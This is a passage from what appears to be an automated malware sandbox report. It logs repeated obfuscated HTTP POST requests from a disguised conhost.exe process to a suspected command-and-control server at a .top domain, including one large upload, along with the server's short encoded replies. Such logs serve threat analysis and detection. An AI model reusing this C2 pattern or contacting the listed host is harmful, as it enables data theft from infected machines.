    Connection: keep-alive
    Data Raw: 3c 55 5c 50
    Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 49727 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:50.734035015 CEST | 347 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1120
    Expect: 100-continue
Oct 1, 2024 05:57:51.090190887 CEST | 1120 | OUT | Data Raw: 58 5d 5f 5b 5c 45 51 54 5c 58 57 5a 54 58 55 51 59 56 59 57 50 50 56 43 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
    Data Ascii: X]_[\EQT\XWZTXUQYVYWPPVC[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!9#3S5(>2-&>&8/($ &1.%!($U+!F/'P,%
Oct 1, 2024 05:57:51.341443062 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:51.469230890 CEST | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:51 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3c 55 5c 50
    Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 49729 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:51.640049934 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1112
    Expect: 100-continue
    Connection: Keep-Alive
Oct 1, 2024 05:57:51.996505976 CEST | 1112 | OUT | Data Raw: [hex dump of request body omitted]
Oct 1, 2024 05:57:52.543951988 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:52.544123888 CEST | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:52 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3c 55 5c 50
    Data Ascii: <U\P
Oct 1, 2024 05:57:52.544197083 CEST | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:52 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3c 55 5c 50
    Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 49730 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:53.102478981 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1120
    Expect: 100-continue
    Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 49731 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:53.230252028 CEST | 373 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 162168
    Expect: 100-continue
    Connection: Keep-Alive
Oct 1, 2024 05:57:53.833775043 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:54.491976023 CEST | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:54 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3c 55 5c 50
    Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.6 | 49732 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:53.380731106 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1120
    Expect: 100-continue
    Connection: Keep-Alive
Oct 1, 2024 05:57:53.730943918 CEST | 1120 | OUT | Data Raw: [hex dump of request body omitted]
Oct 1, 2024 05:57:53.988357067 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:54.117408037 CEST | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:53 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3c 55 5c 50
    Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.6 | 49733 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:54.250392914 CEST | 347 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1112
    Expect: 100-continue
Oct 1, 2024 05:57:54.606724977 CEST | 1112 | OUT | Data Raw: [hex dump of request body omitted]
Oct 1, 2024 05:57:54.856756926 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:54.989316940 CEST | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:54 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3c 55 5c 50
    Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 49734 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:54.877588034 CEST | 347 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1820
    Expect: 100-continue
Oct 1, 2024 05:57:55.230986118 CEST | 1820 | OUT | Data Raw: [hex dump of request body omitted]
Oct 1, 2024 05:57:55.494029999 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:55.741503000 CEST | 308 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:55 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 152
    Connection: keep-alive
    Data Raw: [hex dump of 152-byte response body omitted]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.6 | 49735 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:55.182926893 CEST | 347 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1120
    Expect: 100-continue
Oct 1, 2024 05:57:55.480750084 CEST | 347 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1120
    Expect: 100-continue
Oct 1, 2024 05:57:55.531740904 CEST | 1120 | OUT | Data Raw: [hex dump of request body omitted]
Oct 1, 2024 05:57:56.113842010 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:56.246516943 CEST | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:55 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3c 55 5c 50
    Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.6 | 49736 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:56.377403021 CEST | 347 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1120
    Expect: 100-continue
Oct 1, 2024 05:57:56.731025934 CEST | 1120 | OUT | Data Raw: [hex dump of request body omitted]
Oct 1, 2024 05:57:56.982575893 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:57.108823061 CEST | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:56 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3c 55 5c 50
    Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.6 | 49737 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:57.234302044 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1120
    Expect: 100-continue
    Connection: Keep-Alive
Oct 1, 2024 05:57:57.590303898 CEST | 1120 | OUT | Data Raw: [hex dump of request body omitted]
Oct 1, 2024 05:57:57.859369040 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:57.992934942 CEST | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:57 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3c 55 5c 50
    Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.6 | 49738 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:58.447370052 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1120
    Expect: 100-continue
    Connection: Keep-Alive
Oct 1, 2024 05:57:58.793350935 CEST | 1120 | OUT | Data Raw: [hex dump of request body omitted]
Oct 1, 2024 05:57:59.053325891 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:59.181299925 CEST | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:58 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3c 55 5c 50
    Data Ascii: <U\P


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          27 | 192.168.2.6 | 49739 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:57:59.310153008 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:57:59.668317080 CEST | 1120 | OUT | Data Raw: 58 51 5a 5e 5c 44 54 50 5c 58 57 5a 54 5e 55 50 59 52 59 57 50 5e 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XQZ^\DTP\XWZT^UPYRYWP^VB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!:3!(([>$6$8</3+U%=?2*2$1?T8U(9!F/'P,=
                                                          Oct 1, 2024 05:57:59.934602022 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:00.069160938 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:59 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          28 | 192.168.2.6 | 49740 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:58:00.202050924 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:00.560297012 CEST | 1120 | OUT | Data Raw: 58 50 5a 5b 5c 45 51 52 5c 58 57 5a 54 5a 55 51 59 52 59 58 50 5d 56 48 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XPZ[\EQR\XWZTZUQYRYXP]VH[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT",036] =&&.2^2$-3/R0.(W1911?18V+9!F/'P,-


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          29 | 192.168.2.6 | 49741 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:58:00.764462948 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1828
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:01.121498108 CEST | 1828 | OUT | Data Raw: 5d 56 5a 5b 59 45 54 57 5c 58 57 5a 54 5b 55 58 59 51 59 56 50 5d 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]VZ[YETW\XWZT[UXYQYVP]VA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-,"3>"'>5$8?];3#0> S%!914&_<T8V<9!F/'P,-
                                                          Oct 1, 2024 05:58:01.152592897 CEST | 1236 | OUT | Data Raw: 24 12 3a 55 2f 25 2c 5a 2a 19 02 52 23 3f 35 55 2a 20 32 1b 25 06 03 1c 23 01 25 5f 27 28 34 14 26 05 13 0d 3d 3e 20 5c 24 34 26 07 2b 00 24 31 2b 5b 20 1a 39 5e 0c 29 0b 0e 04 25 27 27 16 00 24 54 52 1b 3a 01 5b 06 13 2b 24 1b 3d 3b 05 26 39 23
                                                          Data Ascii: $:U/%,Z*R#?5U* 2%#%_'(4&=> \$4&+$1+[ 9^)%''$TR:[+$=;&9#8Y>>/(Z0=:2/&Y2=97#3: X!2=$1"_9Z?$ ^1?()$T3-:@-=""<:+$1:9V3R4.=X'<%<X0X+;&-!%#]"?<'1W)</#:<^5:2:4$02<:!<
                                                          Oct 1, 2024 05:58:01.376286983 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:01.508830070 CEST | 308 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:01 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0e 1d 25 5e 27 1a 32 1f 36 02 3e 00 3d 01 37 5a 30 37 0d 5b 2c 2d 06 09 25 3f 20 04 3a 31 26 5d 3c 5f 2e 58 31 3d 2b 5b 26 21 2a 52 26 36 20 5f 0d 10 21 02 35 5e 3e 12 2c 29 37 58 3e 31 30 43 27 20 02 00 33 23 2e 53 28 3d 3b 0a 24 2c 39 54 30 3c 35 0a 2e 26 34 5e 29 24 2c 11 23 01 2d 56 02 1e 22 57 31 3b 22 0f 23 01 22 06 33 16 3c 5f 22 16 35 50 2a 3e 01 04 24 1a 0f 02 2a 2d 20 00 28 5a 3f 10 36 03 21 5b 20 57 32 0a 27 33 27 5c 20 0d 2d 51 05 34 5a 50
                                                          Data Ascii: %^'26>=7Z07[,-%? :1&]<_.X1=+[&!*R&6 _!5^>,)7X>10C' 3#.S(=;$,9T0<5.&4^)$,#-V"W1;"#"3<_"5P*>$*- (Z?6![ W2'3'\ -Q4ZP


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          30 | 192.168.2.6 | 49742 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:58:00.886586905 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:01.230814934 CEST | 1120 | OUT | Data Raw: 5d 50 5f 59 5c 44 54 5f 5c 58 57 5a 54 5c 55 5e 59 54 59 5a 50 5d 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]P_Y\DT_\XWZT\U^YTYZP]VB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!X-#T";0>0"&\-3?S0$!!1&[+<V<9!F/'P,
                                                          Oct 1, 2024 05:58:01.491219997 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:01.625001907 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:01 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          31 | 192.168.2.6 | 49743 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:58:01.747724056 CEST | 347 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:58:02.105789900 CEST | 1120 | OUT | Data Raw: 5d 55 5f 5b 59 47 54 51 5c 58 57 5a 54 5c 55 50 59 54 59 5a 50 5f 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]U_[YGTQ\XWZT\UPYTYZP_VI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT":3+T5;=%'X!1;#Y;0?$.8V&2=2$.\(1+(9!F/'P,
                                                          Oct 1, 2024 05:58:02.362976074 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:02.531914949 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:02 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          32 | 192.168.2.6 | 49744 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:58:02.653613091 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:03.032437086 CEST | 1120 | OUT | Data Raw: 5d 51 5a 58 5c 43 54 52 5c 58 57 5a 54 52 55 5f 59 5a 59 57 50 5d 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]QZX\CTR\XWZTRU_YZYWP]VA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!^-U0 +=!$-.18+,#$(W%W"U%"]<24W?!F/'P,
                                                          Oct 1, 2024 05:58:03.280139923 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:03.417182922 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:03 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          33 | 192.168.2.6 | 49745 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:58:03.556848049 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
